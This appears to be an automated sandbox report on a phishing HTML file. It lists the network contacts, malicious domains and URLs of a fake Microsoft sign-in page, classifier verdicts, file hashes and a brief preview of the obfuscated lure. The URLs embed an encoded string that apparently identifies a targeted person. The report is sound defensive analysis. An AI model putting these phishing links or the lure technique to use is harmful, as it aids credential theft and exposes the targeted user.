    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    file:///C:/Users/user/Desktop/Play_VMNow-GlobalpCOINC.html0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    50ou-vasil-levski.com
    78.142.63.8
    truefalse
      unknown
      a.nel.cloudflare.com
      35.190.80.1
      truefalse
        unknown
        code.jquery.com
        151.101.194.137
        truefalse
          unknown
          cdnjs.cloudflare.com
          104.17.25.14
          truetrue
            unknown
            challenges.cloudflare.com
            104.18.95.41
            truefalse
              unknown
              www.google.com
              142.250.184.228
              truefalse
                unknown
                pulseliftoi.pl
                172.67.186.231
                truetrue
                  unknown
                  gstfreeks.ru
                  172.67.206.58
                  truetrue
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    file:///C:/Users/user/Desktop/Play_VMNow-GlobalpCOINC.htmltrue
                    • Avira URL Cloud: safe
                    unknown
                    https://50ou-vasil-levski.com/tvavx.phptrue
                      unknown
                      https://pulseliftoi.pl/4d2cZ/#0ZXNsaWZrYUBnbG9iYWxwLmNvbQ==true
                        unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        104.17.24.14
                        unknownUnited States
                        13335CLOUDFLARENETUSfalse
                        142.250.186.67
                        unknownUnited States
                        15169GOOGLEUSfalse
                        142.250.186.78
                        unknownUnited States
                        15169GOOGLEUSfalse
                        1.1.1.1
                        unknownAustralia
                        13335CLOUDFLARENETUSfalse
                        78.142.63.8
                        50ou-vasil-levski.comBulgaria
                        31083TELEPOINTBGfalse
                        104.18.95.41
                        challenges.cloudflare.comUnited States
                        13335CLOUDFLARENETUSfalse
                        151.101.130.137
                        unknownUnited States
                        54113FASTLYUSfalse
                        74.125.206.84
                        unknownUnited States
                        15169GOOGLEUSfalse
                        239.255.255.250
                        unknownReserved
                        unknownunknownfalse
                        142.250.185.195
                        unknownUnited States
                        15169GOOGLEUSfalse
                        35.190.80.1
                        a.nel.cloudflare.comUnited States
                        15169GOOGLEUSfalse
                        151.101.194.137
                        code.jquery.comUnited States
                        54113FASTLYUSfalse
                        142.250.184.228
                        www.google.comUnited States
                        15169GOOGLEUSfalse
                        142.250.184.206
                        unknownUnited States
                        15169GOOGLEUSfalse
                        172.67.186.231
                        pulseliftoi.plUnited States
                        13335CLOUDFLARENETUStrue
                        104.17.25.14
                        cdnjs.cloudflare.comUnited States
                        13335CLOUDFLARENETUStrue
                        172.67.206.58
                        gstfreeks.ruUnited States
                        13335CLOUDFLARENETUStrue
                        IP
                        192.168.2.18
                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1500775
                        Start date and time:2024-08-28 22:22:35 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:defaultwindowsinteractivecookbook.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:18
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • EGA enabled
                        Analysis Mode:stream
                        Analysis stop reason:Timeout
                        Sample name:Play_VMNow-GlobalpCOINC.html
                        Detection:MAL
                        Classification:mal92.phis.evad.winHTML@18/6@32/165
                        Cookbook Comments:
                        • Found application associated with file extension: .html
                        • Exclude process from analysis (whitelisted): dllhost.exe
                        • Excluded IPs from analysis (whitelisted): 23.32.185.164
                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net
                        • Not all processes where analyzed, report is missing behavior information
                        • VT rate limit hit for: Play_VMNow-GlobalpCOINC.html
                        InputOutput
                        URL: https://pulseliftoi.pl/4d2cZ/#0ZXNsaWZrYUBnbG9iYWxwLmNvbQ== Model: jbxai
                        {
                        "brand":["CLOUDFLARE"],
                        "contains_trigger_text":false,
                        "prominent_button_name":"unknown",
                        "text_input_field_labels":["unknown"],
                        "pdf_icon_visible":false,
                        "has_visible_captcha":false,
                        "has_urgent_text":false,
                        "has_visible_qrcode":false}
                        URL: https://pulseliftoi.pl/4d2cZ/#0ZXNsaWZrYUBnbG9iYWxwLmNvbQ== Model: jbxai
                        {
                        "brand":["Microsoft"],
                        "contains_trigger_text":true,
                        "prominent_button_name":"Sign in",
                        "text_input_field_labels":["Enter password",
                        "Forgot my password"],
                        "pdf_icon_visible":false,
                        "has_visible_captcha":false,
                        "has_urgent_text":false,
                        "has_visible_qrcode":false}
                        URL: https://pulseliftoi.pl/4d2cZ/#0ZXNsaWZrYUBnbG9iYWxwLmNvbQ== Model: jbxai
                        {
                        "phishing_score":8,
                        "brand_name":"Microsoft",
                        "reasons":"The domain 'pulseliftoi.pl' is not a typical domain for Microsoft,
                         as the company's official domain is'microsoft.com'. This discrepancy raises suspicions about the authenticity of the webpage. The presence of a login page with a 'Forgot my password' link is a common feature of phishing sites,
                         which aims to trick users into providing their login credentials. The minimalistic design of the webpage and the unusual domain name suggest that the site may be a phishing attempt to steal Microsoft user credentials. Although the brand name 'Microsoft' is present,
                         the URL and domain do not match the legitimate domain associated with the brand,
                         indicating a high likelihood of phishing activity."}
                        URL: https://pulseliftoi.pl/4d2cZ/#0ZXNsaWZrYUBnbG9iYWxwLmNvbQ== Model: jbxai
                        {
                        "brand":["Microsoft"],
                        "contains_trigger_text":true,
                        "prominent_button_name":"Sign in",
                        "text_input_field_labels":["Enter password",
                        "Password",
                        "Forgot my password"],
                        "pdf_icon_visible":false,
                        "has_visible_captcha":false,
                        "has_urgent_text":false,
                        "has_visible_qrcode":false}
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Aug 28 19:23:23 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                        Category:dropped
                        Size (bytes):2675
                        Entropy (8bit):3.9819331690861017
                        Encrypted:false
                        SSDEEP:
                        MD5:4BB865BD94CF61AD9285B56FA9E311DC
                        SHA1:2842E256FD417F9AF1E4F4BBB5B66BD392C089F9
                        SHA-256:39CD36313F7E719B43B975453DDA89A7D3A1E9304B0464C2525EBFFEDCB1D9D9
                        SHA-512:76D841999D5725F4C8436D79A944F5CE7987332AD21B4B7E3FDDC02FEC0E07FC2C9A05ACCA572AB130ABDD44706F6EDCDB1475DC32EA1F3EDA542DA648838388
                        Malicious:false
                        Reputation:unknown
                        Preview:L..................F.@.. ...$+.,....9~.!........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I.Y.....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V.Y.....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V.Y............................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y......#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............P.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Aug 28 19:23:23 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                        Category:dropped
                        Size (bytes):2677
                        Entropy (8bit):4.00142400370974
                        Encrypted:false
                        SSDEEP:
                        MD5:ECDF007888257CA1FE3B0DF8F496EFB4
                        SHA1:AB9A8D001D9EB77359AD525E470C4089207CCEA0
                        SHA-256:6AF5DDF1D0034B39291F4FA11F08613EF48D9A99DD5A9BF785081CB33C6DE964
                        SHA-512:5FB2F74C622E21E3E8F11899DBE818BE25E1166D8192848869D6754702B3DFD7249AC0EC6B81146780465967A3269EF97F6A57E7501E95D34AC0D0D6847A1CCE
                        Malicious:false
                        Reputation:unknown
                        Preview:L..................F.@.. ...$+.,......!........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I.Y.....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V.Y.....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V.Y............................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y......#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............P.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 09:23:19 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                        Category:dropped
                        Size (bytes):2691
                        Entropy (8bit):4.003748776865569
                        Encrypted:false
                        SSDEEP:
                        MD5:D0E141A8BA45556DEA30FBCD71BCC2B8
                        SHA1:C465F4B18AE10F65CEC82034970C25B9DFDD3355
                        SHA-256:FCB18EB3265536A220689AED9D42FE9A77FB52980EA2E779ACBD216FC7C9B7C4
                        SHA-512:E9E3448A678F0B8FBA6E0DD7C737F89346E4FFAB811ED367B68E2C299303437330F4B325873375161F043B20A878FC0AF0BCB189325114DFFDFBED89FC86525F
                        Malicious:false
                        Reputation:unknown
                        Preview:L..................F.@.. ...$+.,....?.4 ?.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I.Y.....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V.Y.....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V.Y............................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.R.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............P.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Aug 28 19:23:23 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                        Category:dropped
                        Size (bytes):2679
                        Entropy (8bit):3.998721149940216
                        Encrypted:false
                        SSDEEP:
                        MD5:837283839A93327728889521CB2CA4B7
                        SHA1:C80A01E99315A16110BE6B540D9A3EB31E347A15
                        SHA-256:D5E6AD9E6BC2B999C48AABCCB22BD670386B33424D92F9EF08F7DBDB7B75A252
                        SHA-512:5FA0922678D8A953DB24B74E43C2F9F61AEE67EB28A763080491FBF2D312BDEAEF974153A47B4394453C4EB98923E54AA799DFAAD6A78561B36CC429464ED704
                        Malicious:false
                        Reputation:unknown
                        Preview:L..................F.@.. ...$+.,.....*.!........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I.Y.....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V.Y.....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V.Y............................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y......#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............P.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Aug 28 19:23:23 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                        Category:dropped
                        Size (bytes):2679
                        Entropy (8bit):3.985733383857607
                        Encrypted:false
                        SSDEEP:
                        MD5:990DBC3BCB1105DA429CC051BBA3867B
                        SHA1:B52D70337321BFB22132AD887559D441726E2727
                        SHA-256:667A8B0BED4BB4CB226C2447BD149D041961CB561443414FB18ED4365AD4D767
                        SHA-512:D31DC4FE20D18C77F2FCEB1DD04ED46D9DFBB2CEF0F08C3E03DD8C3B6469A4C648A17011F0091161B183738ECB0BD7ADA22A85F9558F49E5E31382CD45E0EF5F
                        Malicious:false
                        Reputation:unknown
                        Preview:L..................F.@.. ...$+.,.....N.!........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I.Y.....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V.Y.....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V.Y............................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y......#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............P.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Aug 28 19:23:23 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                        Category:dropped
                        Size (bytes):2681
                        Entropy (8bit):3.997653245548512
                        Encrypted:false
                        SSDEEP:
                        MD5:C7715789B34132D1415146942983477A
                        SHA1:F470FE5B68A569FA872A0A646D8300A6C3ADCA29
                        SHA-256:5A3D07FF921C239C12388710BA7A6CDFAF09A5247C7ADBE5A214EF7B698B965A
                        SHA-512:C8839CF11416412C1FE9DE745BB42FC83E01BBDF271D5C6C9CCADC8B2B98E07461FA19D9E0EEC04A314BAE4E3645BF5A1B6723BC3B26E3FE9F4A4473BE5B9C53
                        Malicious:false
                        Reputation:unknown
                        Preview:L..................F.@.. ...$+.,......!........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I.Y.....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V.Y.....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V.Y............................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y......#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............P.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                        File type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                        Entropy (8bit):5.298931761182148
                        TrID:
                        • HyperText Markup Language (6006/1) 100.00%
                        File name:Play_VMNow-GlobalpCOINC.html
                        File size:1'583 bytes
                        MD5:e385371da3811f933910ac0ac3816597
                        SHA1:1b1666cbeb808c71729e28dc7f2c808e794f1601
                        SHA256:70c846a3bcc65bc6822235cc87222330fac88692f56864ee9d493e9b3b5f45f5
                        SHA512:989e98b78fd65ef3ce2c055fc41ffb5a057150c61951cb145a6a79be552cd44d6d5ddd424abcb78fb4eae325a33fa6473abd62fb12a4c559cd5611de176880de
                        SSDEEP:48:1rlaFyAGItDX76/UclLjg1A5RV7FTaa+/:LagIX76Vw1O7dfK
                        TLSH:D731955D3E90C5320AA0031E02B5EA5DB738825875A5F2397CC8466371DDFCD0C82188
                        File Content Preview:<html>..<script>.. ..</script>. <nav..hidden>Do not let.what..you.cannot..do.interfere with..what you.can.do.</nav>. <script>......faraway.=.`ZXNsaWZrYUBnbG9iYWxwLmNvbQ==`;... ... ...</script>. ..<li>Quality.is..not.an..act, it.is.a..habit.</li> --> .
                        Icon Hash:173149cccc490307